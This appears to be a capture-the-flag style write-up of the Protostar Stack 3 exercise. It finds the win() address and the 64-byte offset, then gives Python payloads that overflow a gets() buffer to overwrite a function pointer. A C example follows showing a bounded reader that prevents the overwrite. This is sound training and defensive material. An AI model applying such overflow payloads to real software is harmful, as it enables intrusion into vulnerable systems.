[ExpDev] Exploit Exercise | Protostar | Stack 3

Stack 3
The goal of this challenge is to find an environment variable for the win()
func and to overwrite the func pointer stored on the stack via BOF.

Things to note
gets(buffer);
: The vulnerable func. It reads a line from stdin without checking for buffer overrun, so it is vulnerable to BOF attacks.

win()
: Winning func. Once we overflow the buffer via gets(), we can print out the winning statement by pointing the func pointer on the stack at the win() address.

char buffer[64];
: This sets the buffer length to 64 bytes, so entering more than 64 bytes causes a BOF.
Exploit
Finding win() Address
As the website hints, we can find the win() address with gdb or objdump.

[GDB]
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955

[objdump]
$ objdump -t stack3 | grep win
08048424 g     F .text  00000014              win
Finding Offset
Let's create the following exploit with python:

[Exploit-1]
#!/usr/bin/python
# Probe: 60 bytes of padding, then distinct 4-byte markers so the value
# that lands in the func pointer tells us the offset
padding = "A" * 60 # Giving 60 padding
padding += "BBBBCCCCDDDDEEEEFFFF" # Using different letters
print padding
When we run this against the stack3 program, we now see the "modified" value is overwritten with "0x43434343" (0x43 = 'C').

So our offset value is 64 (60 + BBBB).
We have everything we need: offset value (=64) + address location for win()
(=0x08048424).
[Exploit-2]
#!/usr/bin/python
# win() = 0x8048424
padding = "A" * 64 # 64 bytes of padding reach the func pointer
padding += "\x24\x84\x04\x08" # win() address, little-endian
print padding
When we run this against stack3, we can successfully print out the winning statement.
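As an added example that is not part of this write-up or of the Protostar sources, the C below mirrors the layout described in "Things to note" (a 64-byte buffer immediately followed by a func pointer) with a constructed struct, confirms the 64-byte offset from "Finding Offset" with offsetof, and shows a bounded replacement for gets() that keeps the pointer intact even when fed the 80-byte probe line from Exploit-1. The struct, the read_line_bounded helper, the safe() target and the probe string are assumptions of this example, not the real stack3 frame or binary.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Constructed layout mirroring what the write-up describes: a 64-byte
 * buffer immediately followed by the function pointer. This is an
 * assumption of this example, not the real stack3 stack frame. */
#define BUF_LEN 64

struct frame {
    char buffer[BUF_LEN];
    void (*fp)(void);
};

/* Hypothetical target that fp should keep pointing at. */
static void safe(void) { }

/* Offset of the pointer from the start of the buffer: the value the
 * write-up recovers by probing with distinct 4-byte markers. */
size_t fp_offset(void)
{
    return offsetof(struct frame, fp);
}

/* Bounded stand-in for gets(): copies at most cap-1 bytes of one line
 * from a NUL-terminated input string, stops at '\n', always writes the
 * terminating NUL, and returns how many bytes of the line did not fit
 * so the caller can detect truncation instead of silently overrunning. */
size_t read_line_bounded(char *dst, size_t cap, const char *input)
{
    size_t n = 0, dropped = 0;
    for (const char *p = input; *p != '\0' && *p != '\n'; p++) {
        if (n + 1 < cap)
            dst[n++] = *p;
        else
            dropped++;
    }
    if (cap > 0)
        dst[n] = '\0';
    return dropped;
}

/* Feeds one line into the frame through the bounded reader and reports
 * whether the function pointer still points at safe(). */
int fp_intact_after_read(const char *input)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.fp = safe;
    read_line_bounded(f.buffer, sizeof f.buffer, input);
    return f.fp == safe;
}

/* Constructed 80-byte probe line matching Exploit-1 above. */
const char PROBE_LINE[] =
    "AAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAA"   /* 60 x 'A' */
    "BBBBCCCCDDDDEEEEFFFF";  /* distinct 4-byte markers */

int main(void)
{
    char buf[BUF_LEN];
    size_t dropped = read_line_bounded(buf, sizeof buf, PROBE_LINE);
    printf("fp offset: %zu bytes\n", fp_offset());
    printf("probe length: %zu, dropped: %zu, fp intact: %d\n",
           strlen(PROBE_LINE), dropped, fp_intact_after_read(PROBE_LINE));
    return 0;
}
```

With the 80-byte probe, the bounded reader keeps 63 bytes, drops 17 and leaves fp untouched; the non-zero return value is the signal a program can check instead of letting the overrun happen. gets() itself was removed from the C standard in C11 for exactly this reason, and fgets(buffer, sizeof buffer, stdin) gives the same bounded behaviour on real stdin.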

Thanks for reading!
Next challenge:
- Stack 4 — Stack-based BOF: Basic 4
